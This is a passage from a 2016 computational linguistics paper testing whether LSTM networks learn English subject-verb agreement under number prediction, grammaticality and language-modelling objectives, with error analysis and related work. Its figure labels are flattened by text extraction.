2010; Sundermeyer et al., 2012), parsing (Vinyals et al., 2015; Kiperwasser and Goldberg, 2016; Dyer et al., 2016), machine translation (Bahdanau et al., 2015) and other tasks. The effectiveness of RNNs1 is attributed to their ability to capture statistical contingencies that may span an arbitrary number of words. The word France, for example, is more likely to occur somewhere in a sentence that begins with Paris than in a sentence that begins with Penguins. The fact that an arbitrary number of words can intervene between the mutually predictive words implies that they cannot be captured by models with a fixed window such as n-gram mod- els, but can in principle be captured by RNNs, which do not have an architecturally fixed limit on depen- dency length. RNNs are sequence models: they do not explicitly incorporate syntactic structure. Indeed, many word co-occurrence statistics can be captured by treating the sentence as an unstructured list of words (Paris- France); it is therefore unsurprising that RNNs can learn them well. Other dependencies, however, are sensitive to the syntactic structure of the sentence (Chomsky, 1965; Everaert et al., 2015). To what extent can RNNs learn to model such phenomena based only on sequential cues? Previous research has shown that RNNs (in particu- lar LSTMs) can learn artificial context-free languages (Gers and Schmidhuber, 2001) as well as nesting and 1In this work we use the term RNN to refer to the entire class of sequential recurrent neural networks. Instances of the class include long short-term memory networks (LSTM) and the Simple Recurrent Network (SRN) due to Elman (1990). 521 Transactions of the Association for Computational Linguistics, vol. 4, pp. 521–535, 2016. Action Editor: Hinrich Schütze. Submission batch: 1/2016; Revision batch: 9/2016; Published 12/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. indentation in a programming language (Karpathy et al., 2016). The goal of the present work is to probe their ability to learn natural language hierarchical (syntactic) structures from a corpus without syntactic annotations. As a first step, we focus on a particular dependency that is commonly regarded as evidence for hierarchical structure in human language: English subject-verb agreement, the phenomenon in which the form of a verb depends on whether the subject is singular or plural (the kids play but the kid plays; see additional details in Section 2). If an RNN-based model succeeded in learning this dependency, that would indicate that it can learn to approximate or even faithfully implement syntactic structure. Our main interest is in whether LSTMs have the capacity to learn structural dependencies from a nat- ural corpus. We therefore begin by addressing this question under the most favorable conditions: train- ing with explicit supervision. In the setting with the strongest supervision, which we refer to as the num- ber prediction task, we train it directly on the task of guessing the number of a verb based on the words that preceded it (Sections 3 and 4). We further experiment with a grammaticality judgment training objective, in which we provide the model with full sentences an- notated as to whether or not they violate subject-verb number agreement, without an indication of the locus of the violation (Section 5). Finally, we trained the model without any grammatical supervision, using a language modeling objective (predicting the next word). Our quantitative results (Section 4) and qualitative analysis (Section 7) indicate that most naturally oc- curring agreement cases in the Wikipedia corpus are easy: they can be resolved without syntactic informa- tion, based only on the sequence of nouns preceding the verb. This leads to high overall accuracy in all models. Most of our experiments focus on the super- vised number prediction model. The accuracy of this model was lower on harder cases, which require the model to encode or approximate structural informa- tion; nevertheless, it succeeded in recovering the ma- jority of agreement cases even when four nouns of the opposite number intervened between the subject and the verb (17% errors). Baseline models failed spec- tacularly on these hard cases, performing far below chance levels. Fine-grained analysis revealed that mistakes are much more common when no overt cues to syntactic structure (in particular function words) are available, as is the case in noun-noun compounds and reduced relative clauses. This indicates that the number prediction model indeed managed to capture a decent amount of syntactic knowledge, but was overly reliant on function words. Error rates increased only mildly when we switched to more indirect supervision consisting only of sentence-level grammaticality annotations without an indication of the crucial verb. By contrast, the language model trained without explicit grammati- cal supervision performed worse than chance on the harder agreement prediction cases. Even a state-of- the-art large-scale language model (Jozefowicz et al., 2016) was highly sensitive to recent but struc- turally irrelevant nouns, making more than five times as many mistakes as the number prediction model on these harder cases. These results suggest that explicit supervision is necessary for learning the agreement dependency using this architecture, limiting its plau- sibility as a model of child language acquisition (El- man, 1990). From a more applied perspective, this result suggests that for tasks in which it is desirable to capture syntactic dependencies (e.g., machine trans- lation or language generation), language modeling objectives should be supplemented by supervision signals that directly capture the desired behavior. 2 Background: Subject-Verb Agreement as Evidence for Syntactic Structure The form of an English third-person present tense verb depends on whether the head of the syntactic subject is plural or singular:2 (1) a. The key is on the table. b. *The key are on the table. c. *The keys is on the table. d. The keys are on the table. While in these examples the subject’s head is adjacent to the verb, in general the two can be separated by some sentential material:3 2 Identifying the head of the subject is typically straightfor- ward. In what follows we will use the shorthand “the subject” to refer to the head of the subject. 3In the examples, the subject and the corresponding verb are marked in boldface, agreement attractors are underlined and intervening nouns of the same number as the subject are marked in italics. Asterisks mark unacceptable sentences. 522 (2) The keys to the cabinet are on the table. Given a syntactic parse of the sentence and a verb, it is straightforward to identify the head of the subject that corresponds to that verb, and use that information to determine the number of the verb (Figure 1). The keys to the cabinet are on the table det nsubj prep det pobj prep det pobj root Figure 1: The form of the verb is determined by the head of the subject, which is directly connected to it via an nsubj edge. Other nouns that intervene between the head of the subject and the verb (here cabinet is such a noun) are irrelevant for determining the form of the verb and need to be ignored. By contrast, models that are insensitive to structure may run into substantial difficulties capturing this de- pendency. One potential issue is that there is no limit to the complexity of the subject NP, and any number of sentence-level modifiers and parentheticals—and therefore an arbitrary number of words—can appear between the subject and the verb: (3) The building on the far right that’s quite old and run down is the Kilgore Bank Building. This property of the dependency entails that it can- not be captured by an n-gram model with a fixed n. RNNs are in principle able to capture dependencies of an unbounded length; however, it is an empirical question whether or not they will learn to do so in practice when trained on a natural corpus. A more fundamental challenge that the depen- dency poses for structure-insensitive models is the possibility of agreement attraction errors (Bock and Miller, 1991). The correct form in (3) could be se- lected using simple heuristics such as “agree with the most recent noun”, which are readily available to sequence models. In general, however, such heuris- tics are unreliable, since other nouns can intervene between the subject and the verb in the linear se- quence of the sentence. Those intervening nouns can have the same number as the subject, as in (4), or the opposite number as in (5)-(7): (4) Alluvial soils carried in the floodwaters add nutrients to the floodplains. (5) The only championship banners that are cur- rently displayed within the building are for national or NCAA Championships. (6) The length of the forewings is 12-13. (7) Yet the ratio of men who survive to the women and children who survive is not clear in this story. Intervening nouns with the opposite number from the subject are called agreement attractors. The poten- tial presence of agreement attractors entails that the model must identify the head of the syntactic subject that corresponds to a given verb in order to choose the correct inflected form of that verb. Given the difficulty in identifying the subject from the linear sequence of the sentence, dependencies such as subject-verb agreement serve as an argument for structured syntactic representations in humans (Everaert et al., 2015); they may challenge models such as RNNs that do not have pre-wired syntac- tic representations. We note that subject-verb num- ber agreement is only one of a number of structure- sensitive dependencies; other examples include nega- tive polarity items (e.g., any) and reflexive pronouns (herself ). Nonetheless, a model’s success in learning subject-verb agreement would be highly suggestive of its ability to master hierarchical structure. 3 The Number Prediction Task To what extent can a sequence model learn to be sensi- tive to the hierarchical structure of natural language? To study this question, we propose the number pre- diction task. In this task, the model sees the sentence up to but not including a present-tense verb, e.g.: (8) The keys to the cabinet It then needs to guess the number of the following verb (a binary choice, either PLURAL or SINGULAR). We examine variations on this task in Section 5. In order to perform well on this task, the model needs to encode the concepts of syntactic number and syntactic subjecthood: it needs to learn that some words are singular and others are plural, and to be able to identify the correct subject. As we have illus- 523 trated in Section 2, correctly identifying the subject that corresponds to a particular verb often requires sensitivity to hierarchical syntax. Data: An appealing property of the number predic- tion task is that we can generate practically unlimited training and testing examples for this task by query- ing a corpus for sentences with present-tense verbs, and noting the number of the verb. Importantly, we do not need to correctly identify the subject in order to create a training or test example. We generated a corpus of ∼1.35 million number prediction problems based on Wikipedia, of which ∼121,500 (9%) were used for training, ∼13,500 (1%) for validation, and the remaining ∼1.21 million (90%) were reserved for testing.4 The large number of test sentences was necessary to ensure that we had a good variety of test sentences representing less common constructions (see Section 4).5 Model and baselines: We encode words as one- hot vectors: the model does not have access to the characters that make up the word. Those vectors are then embedded into a 50-dimensional vector space. An LSTM with 50 hidden units reads those embed- ding vectors in sequence; the state of the LSTM at the end of the sequence is then fed into a logistic regression classifier. The network is trained6 in an end-to-end fashion, including the word embeddings.7 To isolate the effect of syntactic structure, we also consider a baseline which is exposed only to the nouns in the sentence, in the order in which they appeared originally, and is then asked to predict the number of the following verb. The goal of this base- 4We limited our search to sentences that were shorter than 50 words. Whenever a sentence had more than one subject-verb dependency, we selected one of the dependencies at random. 5Code and data are available at http://tallinzen. net/projects/lstm_agreement. 6The network was optimized using Adam (Kingma and Ba, 2015) and early stopping based on validation set error. We trained the number prediction model 20 times with different random initializations, and report accuracy averaged across all runs. The models described in Sections 5 and 6 are based on 10 runs, with the exception of the language model, which is slower to train and was trained once. 7The size of the vocabulary was capped at 10000 (after low- ercasing). Infrequent words were replaced with their part of speech (Penn Treebank tagset, which explicitly encodes number distinctions); this was the case for 9.6% of all tokens and 7.1% of the subjects. line is to withhold the syntactic information carried by function words, verbs and other parts of speech. We explore two variations on this baseline: one that only receives common nouns (dogs, pipe), and an- other that also receives pronouns (he) and proper nouns (France). We refer to these as the noun-only baselines. 4 Number Prediction Results Overall accuracy: Accuracy was very high over- all: the system made an incorrect number prediction only in 0.83% of the dependencies. The noun-only baselines performed significantly worse: 4.2% errors for the common-nouns case and 4.5% errors for the all-nouns case. This suggests that function words, verbs and other syntactically informative elements play an important role in the model’s ability to cor- rectly predict the verb’s number. However, while the noun-only baselines made more than four times as many mistakes as the number prediction system, their still-low absolute error rate indicates that around 95% of agreement dependencies can be captured based solely on the sequence of nouns preceding the verb. This is perhaps unsurprising: sentences are often short and the verb is often directly adjacent to the sub- ject, making the identification of the subject simple. To gain deeper insight into the syntactic capabilities of the model, then, the rest of this section investigates its performance on more challenging dependencies.8 Distance: We first examine whether the network shows evidence of generalizing to dependencies where the subject and the verb are far apart. We focus in this analysis on simpler cases where no nouns in- tervened between the subject and the verb. As Figure 2a shows, performance did not degrade considerably when the distance between the subject and the verb grew up to 15 words (there were very few longer dependencies). This indicates that the network gen- eralized the dependency from the common distances of 0 and 1 to rare distances of 10 and more. Agreement attractors: We next examine how the model’s error rate was affected by nouns that inter- vened between the subject and the verb in the linear 8These properties of the dependencies were identified by parsing the test sentences using the parser described in Goldberg and Nivre (2012). 524 (a) 2 4 6 8 10 12 14 Distance (no intervening nouns) 0% 10% 20% 30% 40% 50% E rr o r ra te (b) Plural subject Singular subject 0% 5% 10% 15% 20% E rr o r ra te Last intervening noun None Plural Singular (c) 0 1 2 3 4 Count of attractors 0% 20% 40% 60% 80% 100% E rr o r ra te Baseline (common nouns) Number prediction Majority class Random guess (d) No re lati ve cla use Wi th rel ativ ize r Wi tho ut rel ativ ize r 0% 20% 40% 60% 80% 100% E rr o r ra te Majority Random (e) 0 1 2 3 4 5 6 7 Count of attractors 100 101 102 103 104 105 106 107 C o u n t o f d e p e n d e n ci e s All Homogeneous (f) 2 1 0 1 2 PC1 0.6 0.0 0.6 P C 2 Plural Singular Figure 2: (a-d) Error rates of the LSTM number prediction model as a function of: (a) distance between the subject and the verb, in dependencies that have no intervening nouns; (b) presence and number of last intervening noun; (c) count of attractors in dependencies with homogeneous intervention; (d) presence of a relative clause with and without an overt relativizer in dependencies with homogeneous intervention and exactly one attractor. All error bars represent 95% binomial confidence intervals. (e-f) Additional plots: (e) count of attractors per dependency in the corpus (note that the y-axis is on a log scale); (f) embeddings of singular and plural nouns, projected onto their first two principal components. order of the sentence. We first focus on whether or not there were any intervening nouns, and if there were, whether the number of the subject differed from the number of the last intervening noun—the type of noun that would trip up the simple heuristic of agreeing with the most recent noun. As Figure 2b shows, a last intervening noun of the same number as the subject increased error rates only moderately, from 0.4% to 0.7% in singular subjects and from 1% to 1.4% in plural subjects. On the other hand, when the last intervening noun was an agree- ment attractor, error rates increased by almost an order of magnitude (to 6.5% and 5.4% respectively). Note, however, that even an error rate of 6.5% is quite impressive considering uninformed strategies such as random guessing (50% error rate), always assigning the more common class label (32% error rate, since 32% of the subjects in our corpus are plu- ral) and the number-of-most-recent-noun heuristic (100% error rate). The noun-only LSTM baselines performed much worse in agreement attraction cases, with error rates of 46.4% (common nouns) and 40% (all nouns). We next tested whether the effect of attractors is cumulative, by focusing on dependencies with multi- ple attractors. To avoid cases in which the effect of an attractor is offset by an intervening noun with the same number as the subject, we restricted our search to dependencies in which all of the intervening nouns had the same number, which we term dependencies with homogeneous intervention. For example, (9) has homogeneous intervention whereas (10) does not: (9) The roses in the vase by the door are red. (10) The roses in the vase by the chairs are red. Figure 2c shows that error rates increased gradually as more attractors intervened between the subject and the verb. Performance degraded quite slowly, how- ever: even with four attractors the error rate was only 17.6%. As expected, the noun-only baselines per- formed significantly worse in this setting, reaching an error rate of up to 84% (worse than chance) in the case of four attractors. This confirms that syntactic cues are critical for solving the harder cases. 525 Relative clauses: We now look in greater detail into the network’s performance when the words that intervened between the subject and verb contained a relative clause. Relative clauses with attractors are likely to be fairly challenging, for several rea- sons. They typically contain a verb that agrees with the attractor, reinforcing the misleading cue to noun number. The attractor is often itself a subject of an irrelevant verb, making a potential “agree with the most recent subject” strategy unreliable. Finally, the existence of a relative clause is sometimes not overtly indicated by a function word (relativizer), as in (11) (for comparison, see the minimally different (12)): (11) The landmarks this article lists here are also run-of-the-mill and not notable. (12) The landmarks that this article lists here are also run-of-the-mill and not notable. For data sparsity reasons we restricted our attention to dependencies with a single attractor and no other intervening nouns. As Figure 2d shows, attraction errors were more frequent in dependencies with an overt relative clause (9.9% errors) than in dependen- cies without a relative clause (3.2%), and consider- ably more frequent when the relative clause was not introduced by an overt relativizer (25%). As in the case of multiple attractors, however, while the model struggled with the more difficult dependencies, its performance was much better than random guessing, and slightly better than a majority-class strategy. Word representations: We explored the 50- dimensional word representations acquired by the model by performing a principal component anal- ysis. We assigned a part-of-speech (POS) to each word based on the word’s most common POS in the corpus. We only considered relatively unambiguous words, in which a single POS accounted for more than 90% of the word’s occurrences in the corpus. Figure 2f shows that the first principal component corresponded almost perfectly to the expected num- ber of the noun, suggesting that the model learned the number of specific words very well; recall that the model did not have access during training to noun number annotations or to morphological suffixes such as -s that could be used to identify plurals. Visualizing the network’s activations: We start investigating the inner workings of the number pre- diction network by analyzing its activation in re- sponse to particular syntactic constructions. To sim- plify the analysis, we deviate from our practice in the rest of this paper and use constructed sentences. We first constructed sets of sentence prefixes based on the following patterns: (13) PP: The toy(s) of the boy(s)... (14) RC: The toy(s) that the boy(s)... These patterns differ by exactly one function word, which determines the type of the modifier of the main clause subject: a prepositional phrase (PP) in the first sentence and a relative clause (RC) in the second. In PP sentences the correct number of the upcoming verb is determined by the main clause subject toy(s); in RC sentences it is determined by the embedded subject boy(s). We generated all four versions of each pattern, and repeated the process ten times with different lexical items (the house(s) of/that the girl(s), the computer(s) of/that the student(s), etc.), for a total of 80 sentences. The network made correct number predictions for all 40 PP sentences, but made three errors in RC sen- tences. We averaged the word-by-word activations across all sets of ten sentences that had the same com- bination of modifier (PP or RC), first noun number and second noun number. Plots of the activation of all 50 units are provided in the Appendix (Figure 5). Figure 3a highlights a unit (Unit 1) that shows a particularly clear pattern: it tracks the number of the main clause subject throughout the PP modifier; by contrast, it resets when it reaches the relativizer that which introduces the RC modifier, and then switches to tracking the number of the embedded subject. To explore how the network deals with dependen- cies spanning a larger number of words, we tracked its activation during the processing of the following two sentences:9 (15) The houses of/that the man from the office across the street... The network made the correct prediction for the PP 9We simplified this experiment in light of the relative robust- ness of the first experiment to lexical items and to whether each of the nouns was singular or plural. 526 (a) (b) th e ho us es th at /o f th e m an fro m th e of fic e ac ro ss th e st re et 0.0 0.5 1.0 P (p lu r a l) PP RC Class prediction (c) Figure 3: Word-by-word visualization of LSTM activation: (a) a unit that correctly predicts the number of an upcoming verb. This number is determined by the first noun (X) when the modifier is a prepositional phrase (PP) and by the second noun (Y) when it is an object relative clause (RC); (b) the evolution of the predictions in the case of a longer modifier: the predictions correctly diverge at the embedded noun, but then incorrectly converge again; (c) the activation of four representative units over the course of the same sentences. but not the RC sentence (as before, the correct pre- dictions are PLURAL for PP and SINGULAR for RC). Figure 3b shows that the network begins by mak- ing the correct prediction for RC immediately after that, but then falters: as the sentence goes on, the resetting effect of that diminishes. The activation time courses shown in Figure 3c illustrate that Unit 1, which identified the subject correctly when the prefix was short, gradually forgets that it is in an embedded clause as the prefix grows longer. By contrast, Unit 0 shows a stable capacity to remember the current embedding status. Additional representative units shown in Figure 3c are Unit 46, which consistently stores the number of the main clause subject, and Unit 27, which tracks the number of the most recent noun, resetting at noun phrase boundaries. While the interpretability of these patterns is en- couraging, our analysis only scratches the surface of the rich possibilities of a linguistically-informed analysis of a neural network trained to perform a syntax-sensitive task; we leave a more extensive in- vestigation for future work. 5 Alternative Training Objectives The number prediction task followed a fully super- vised objective, in which the network identifies the number of an upcoming verb based only on the words preceding the verb. This section proposes three objec- tives that modify some of the goals and assumptions of the number prediction objective (see Table 1 for an overview). Verb inflection: This objective is similar to num- ber prediction, with one difference: the network re- ceives not only the words leading up to the verb, but also the singular form of the upcoming verb (e.g., writes). In practice, then, the network needs to decide between the singular and plural forms of a particular verb (writes or write). Having access to the semantics of the verb can help the network identify the noun that serves as its subject without using the syntactic subjecthood criteria. For example, in the following sentence: (16) People from the capital often eat pizza. 527 Training objective Sample input Training signal Prediction task Correct answer Number prediction The keys to the cabinet PLURAL SINGULAR/PLURAL? PLURAL Verb inflection The keys to the cabinet [is/are] PLURAL SINGULAR/PLURAL? PLURAL Grammaticality The keys to the cabinet are here. GRAMMATICAL GRAMMATICAL/UNGRAMMATICAL? GRAMMATICAL Language model The keys to the cabinet are P(are) > P(is)? True Table 1: Examples of the four training objectives and corresponding prediction tasks. only people is a plausible subject for eat; the network can use this information to infer that the correct form of the verb is eat is rather than eats. This objective is similar to the task that humans face during language production: after the speaker has decided to use a particular verb (e.g., write), he or she needs to decide whether its form will be write or writes (Levelt et al., 1999; Staub, 2009). Grammaticality judgments: The previous objec- tives explicitly indicate the location in the sentence in which a verb can appear, giving the network a cue to syntactic clause boundaries. They also explicitly di- rect the network’s attention to the number of the verb. As a form of weaker supervision, we experimented with a grammaticality judgment objective. In this scenario, the network is given a complete sentence, and is asked to judge whether or not it is grammatical. To train the network, we made half of the examples in our training corpus ungrammatical by flipping the number of the verb.10 The network read the entire sentence and received a supervision signal at the end. This task is modeled after a common human data col- lection technique in linguistics (Schütze, 1996), al- though our training regime is of course very different to the training that humans are exposed to: humans rarely receive ungrammatical sentences labeled as such (Bowerman, 1988). Language modeling (LM): Finally, we experi- mented with a word prediction objective, in which the model did not receive any grammatically relevant supervision (Elman, 1990; Elman, 1991). In this sce- nario, the goal of the network is to predict the next word at each point in every sentence. It receives un- 10In some sentences this will not in fact result in an ungram- matical sentence, e.g. with collective nouns such as group, which are compatible with both singular and plural verbs in some di- alects of English (Huddleston and Pullum, 2002); those cases appear to be rare. labeled sentences and is not specifically instructed to attend to the number of the verb. In the network that implements this training scenario, RNN activation after each word is fed into a fully connected dense layer followed by a softmax layer over the entire vocabulary. We evaluate the knowledge that the network has acquired about subject-verb noun agreement using a task similar to the verb inflection task. To per- form the task, we compare the probabilities that the model assigns to the two forms of the verb that in fact occurred in the corpus (e.g., write and writes), and select the form with the higher probability.11 As this task is not part of the network’s training objec- tive, and the model needs to allocate considerable resources to predicting each word in the sentence, we expect the LM to perform worse than the explicitly supervised objectives. Results: When considering all agreement depen- dencies, all models achieved error rates below 7% (Figure 4a); as mentioned above, even the noun-only number prediction baselines achieved error rates be- low 5% on this task. At the same time, there were large differences in accuracy across training objec- tives. The verb inflection network performed slightly but significantly better than the number prediction one (0.8% compared to 0.83% errors), suggesting that the semantic information carried by the verb is moderately helpful. The grammaticality judgment objective performed somewhat worse, at 2.5% errors, but still outperformed the noun-only baselines by a large margin, showing the capacity of the LSTM ar- chitecture to learn syntactic dependencies even given fairly indirect evidence. 11One could also imagine performing the equivalent of the number prediction task by aggregating LM probability mass over all plural verbs and all singular verbs. This approach may be more severely affected by part-of-speech ambiguous words than the one we adopted; we leave the exploration of this approach to future work. 528 (a) Nu mb er pre dic tion Gr am ma tica lity jud gm en ts Ve rb infl ect ion La ng ua ge m od el Ba sel ine (c om mo n n ou ns) Ba sel ine (a ll n ou ns) 0% 2% 4% 6% 8% 10% O ve ra ll e rr o r ra te (b) 0 1 2 3 4 Count of attractors 0% 20% 40% 60% 80% 100% E rr o r ra te Grammaticality Verb inflection Language modeling Number prediction Baseline (all nouns) Baseline (common nouns) Majority class Random guess (c) 0 1 2 3 4 Count of attractors 0% 20% 40% 60% 80% 100% E rr o r ra te Our LM Verb inflection Google LM Majority Random (d) 0 1 2 3 4 Count of attractors 0% 20% 40% 60% 80% 100% E rr o r ra te LSTMSRN LSTM (targeted) Majority Random Number prediction (e) . 0 1 2 3 4 Count of attractors 0% 20% 40% 60% 80% 100% E rr o r ra te Majority Random Singular subj. Plural subj. LSTM 0 1 2 3 4 Count of attractors Majority Random Singular subj. Plural subj. SRN Figure 4: Alternative tasks and additional experiments: (a) overall error rate across tasks (note that the y-axis ends in 10%); (b) effect of count of attractors in homogeneous dependencies across training objectives; (c) comparison of the Google LM (Jozefowicz et al., 2016) to our LM and one of our supervised verb inflection systems, on a sample of sentences; (d) number prediction: effect of count of attractors using SRNs with standard training or LSTM with targeted training; (e) number prediction: difference in error rate between singular and plural subjects across RNN cell types. Error bars represent binomial 95% confidence intervals. The worst performer was the language model. It made eight times as many errors as the original num- ber prediction network (6.78% compared to 0.83%), and did substantially worse than the noun-only base- lines (though recall that the noun-only baselines were still explicitly trained to predict verb number). The differences across the networks are more strik- ing when we focus on dependencies with agreement attractors (Figure 4b). Here, the language model does worse than chance in the most difficult cases, and only slightly better than the noun-only baselines. The worse-than-chance performance suggests that attractors actively confuse the networks rather than cause them to make a random decision. The other models degrade more gracefully with the number of agreement attractors; overall, the grammaticality judgment objective is somewhat more difficult than the number prediction and verb inflection ones. In summary, we conclude that while the LSTM is capa- ble of learning syntax-sensitive agreement dependen- cies under various objectives, the language-modeling objective alone is not sufficient for learning such de- pendencies, and a more direct form of training signal is required. Comparison to a large-scale language model: One objection to our language modeling result is that our LM faced a much harder objective than our other models—predicting a distribution over 10,000 vocabulary items is certainly harder than bi- nary classification—but was equipped with the same capacity (50-dimensional hidden state and word vec- tors). Would the performance gap between the LM and the explicitly supervised models close if we in- creased the capacity of the LM? We address this question using a very large pub- licly available LM (Jozefowicz et al., 2016), which we refer to as the Google LM.12 The Google LM rep- resents the current state-of-the-art in language mod- eling: it is trained on a billion-word corpus (Chelba et al., 2013), with a vocabulary of 800,000 words. It is based on a two-layer LSTM with 8192 units in each layer, or more than 300 times as many units 12 https://github.com/tensorflow/models/ tree/master/lm_1b 529 as our LM; at 1.04 billion parameters it has almost 2000 times as many parameters. It is a fine-tuned language model that achieves impressive perplexity scores on common benchmarks, requires a massive infrastructure for training, and pushes the boundaries of what’s feasible with current hardware. We tested the Google LM with the methodology we used to test ours.13 Due to computational resource limitations, we did not evaluate it on the entire test set, but sampled a random selection of 500 sentences for each count of attractors (testing a single sentence under the Google LM takes around 5 seconds on average). The results are presented in Figure 4c, where they are compared to the performance of the supervised verb inflection system. Despite having an order of magnitude more parameters and significantly larger training data, the Google LM performed poorly compared to the supervised models; even a single attractor led to a sharp increase in error rate to 28.5%, almost as high as our small-scale LM (32.6% on the same sentences). While additional attractors caused milder degradation than in our LM, the performance of the Google LM on sentences with four attractors was still worse than always guessing the majority class (SINGULAR). In summary, our experiments with the Google LM do not change our conclusions: the contrast between the poor performance of the LMs and the strong per- formance of the explicitly supervised objectives sug- gests that direct supervision has a dramatic effect on the model’s ability to learn syntax-sensitive de- pendencies. Given that the Google LM was already trained on several hundred times more data than the number prediction system, it appears unlikely that its relatively poor performance was due to lack of training data. 6 Additional Experiments Comparison to simple recurrent networks: How much of the success of the network is due to the LSTM cells? We repeated the number prediction experiment with a simple recurrent network (SRN) (Elman, 1990), with the same number of hidden units. The SRN’s performance was inferior to the 13One technical exception was that we did not replace low- frequency words with their part-of-speech, since the Google LM is a large-vocabulary language model, and does not have parts-of-speech as part of its vocabulary. LSTM’s, but the average performance for a given number of agreement attractors does not suggest a qualitative difference between the cell types: the SRN makes about twice as many errors as the LSTM across the board (Figure 4d). Training only on difficult dependencies: Only a small proportion of the dependencies in the corpus had agreement attractors (Figure 2e). Would the network generalize better if dependencies with in- tervening nouns were emphasized during training? We repeated our number prediction experiment, this time training the model only on dependencies with at least one intervening noun (of any number). We doubled the proportion of training sentences to 20%, since the total size of the corpus was smaller (226K dependencies). This training regime resulted in a 27% decrease in error rate on dependencies with exactly one attractor (from 4.1% to 3.0%). This decrease is statistically sig- nificant, and encouraging given that the total number of dependencies in training was much lower, which complicates the learning of word embeddings. Error rates mildly decreased in dependencies with more attractors as well, suggesting some generalization (Figure 4d). Surprisingly, a similar experiment us- ing the grammaticality judgment task led to a slight increase in error rate. While tentative at this point, these results suggest that oversampling difficult train- ing cases may be beneficial; a curriculum progressing from easier to harder dependencies (Elman, 1993) may provide additional gains. 7 Error Analysis Singular vs. plural subjects: Most of the nouns in English are singular: in our corpus, the fraction of singular subjects is 68%. Agreement attraction errors in humans are much more common when the attractor is plural than when it is singular (Bock and Miller, 1991; Eberhard et al., 2005). Do our models’ error rates depend on the number of the subject? As Figure 2b shows, our LSTM number prediction model makes somewhat more agreement attraction errors with plural than with singular attractors; the difference is statistically significant, but the asymme- try is much less pronounced than in humans. Inter- estingly, the SRN version of the model does show a large asymmetry, especially as the count of attractors 530 increases; with four plural attractors the error rate reaches 60% (Figure 4e). Qualitative analysis: We manually examined a sample of 200 cases in which the majority of the 20 runs of the number prediction network made the wrong prediction. There were only 8890 such depen- dencies (about 0.6%). Many of those were straight- forward agreement attraction errors; others were dif- ficult to interpret. We mention here three classes of errors that can motivate future experiments. The networks often misidentified the heads of noun-noun compounds. In (17), for example, the models predict a singular verb even though the num- ber of the subject conservation refugees should be determined by its head refugees. This suggests that the networks didn’t master the structure of English noun-noun compounds.14 (17) Conservation refugees live in a world col- ored in shades of gray; limbo. (18) Information technology (IT) assets com- monly hold large volumes of confidential data. Some verbs that are ambiguous with plural nouns seem to have been misanalyzed as plural nouns and consequently act as attractors. The models predicted a plural verb in the following two sentences even though neither of them has any plural nouns, possibly because of the ambiguous verbs drives and lands: (19) The ship that the player drives has a very high speed. (20) It was also to be used to learn if the area where the lander lands is typical of the sur- rounding terrain. Other errors appear to be due to difficulty not in identifying the subject but in determining whether it is plural or singular. In Example (22), in particular, there is very little information in the left context of the subject 5 paragraphs suggesting that the writer considers it to be singular: 14The dependencies are presented as they appeared in the corpus; the predicted number was the opposite of the correct one (e.g., singular in (17), where the original is plural). (21) Rabaul-based Japanese aircraft make three dive-bombing attacks. (22) The lead is also rather long; 5 paragraphs is pretty lengthy for a 62 kilobyte article. The last errors point to a limitation of the number prediction task, which jointly evaluates the model’s ability to identify the subject and its ability to assign the correct number to noun phrases. 8 Related Work The majority of NLP work on neural networks eval- uates them on their performance in a task such as language modeling or machine translation (Sunder- meyer et al., 2012; Bahdanau et al., 2015). These evaluation setups average over many different syn- tactic constructions, making it difficult to isolate the network’s syntactic capabilities. Other studies have tested the capabilities of RNNs to learn simple artificial languages. Gers and Schmid- huber (2001) showed that LSTMs can learn the context-free language anbn, generalizing to ns as high as 1000 even when trained only on n ∈ {1, . . . , 10}. Simple recurrent networks struggled with this language (Rodriguez et al., 1999; Rodriguez, 2001). These results have been recently replicated and extended by Joulin and Mikolov (2015). Elman (1991) tested an SRN on a miniature lan- guage that simulated English relative clauses, and found that the network was only able to learn the language under highly specific circumstances (El- man, 1993), though later work has called some of his conclusions into question (Rohde and Plaut, 1999; Cartling, 2008). Frank et al. (2013) studied the ac- quisition of anaphora coreference by SRNs, again in a miniature language. Recently, Bowman et al. (2015) tested the ability of LSTMs to learn an artifi- cial language based on propositional logic. As in our study, the performance of the network degraded as the complexity of the test sentences increased. Karpathy et al. (2016) present analyses and visual- ization methods for character-level RNNs. Kádár et al. (2016) and Li et al. (2016) suggest visualization techniques for word-level RNNs trained to perform tasks that aren’t explicitly syntactic (image caption- ing and sentiment analysis). Early work that used neural networks to model 531 grammaticality judgments includes Allen and Sei- denberg (1999) and Lawrence et al. (1996). More re- cently, the connection between grammaticality judg- ments and the probabilities assigned by a language model was explored by Clark et al. (2013) and Lau et al. (2015). Finally, arguments for evaluating NLP models on a strategically sampled set of dependency types rather than a random sample of sentences have been made in the parsing literature (Rimell et al., 2009; Nivre et al., 2010; Bender et al., 2011). 9 Discussion and Future Work Neural network architectures are typically evaluated on random samples of naturally occurring sentences, e.g., using perplexity on held-out data in language modeling. Since the majority of natural language sen- tences are grammatically simple, models can achieve high overall accuracy using flawed heuristics that fail on harder cases. This makes it difficult to distin- guish simple but robust sequence models from more expressive architectures (Socher, 2014; Grefenstette et al., 2015; Joulin and Mikolov, 2015). Our work suggests an alternative strategy—evaluation on natu- rally occurring sentences that are sampled based on their grammatical complexity—which can provide more nuanced tests of language models (Rimell et al., 2009; Bender et al., 2011). This approach can be extended to the training stage: neural networks can be encouraged to develop more sophisticated generalizations by oversampling grammatically challenging training sentences. We took a first step in this direction when we trained the network only on dependencies with intervening nouns (Section 6). This training regime indeed im- proved the performance of the network; however, the improvement was quantitative rather than qualitative: there was limited generalization to dependencies that were even more difficult than those encountered in training. Further experiments are needed to establish the efficacy of this method. A network that has acquired syntactic represen- tations sophisticated enough to handle subject-verb agreement is likely to show improved performance on other structure-sensitive dependencies, including pronoun coreference, quantifier scope and negative polarity items. As such, neural models used in NLP applications may benefit from grammatically sophis- ticated sentence representations developed in a multi- task learning setup (Caruana, 1998), where the model is trained concurrently on the task of interest and on one of the tasks we proposed in this paper. Of course, grammatical phenomena differ from each other in many ways. The distribution of negative polarity items is highly sensitive to semantic factors (Gian- nakidou, 2011). Restrictions on unbounded depen- dencies (Ross, 1967) may require richer syntactic representations than those required for subject-verb dependencies. The extent to which the results of our study will generalize to other constructions and other languages, then, is a matter for empirical research. Humans occasionally make agreement attraction mistakes during language production (Bock and Miller, 1991) and comprehension (Nicol et al., 1997). These errors persist in human acceptability judg- ments (Tanner et al., 2014), which parallel our gram- maticality judgment task. Cases of grammatical agreement with the nearest rather than structurally rel- evant constituent have been documented in languages such as Slovenian (Marušič et al., 2007), and have even been argued to be occasionally grammatical 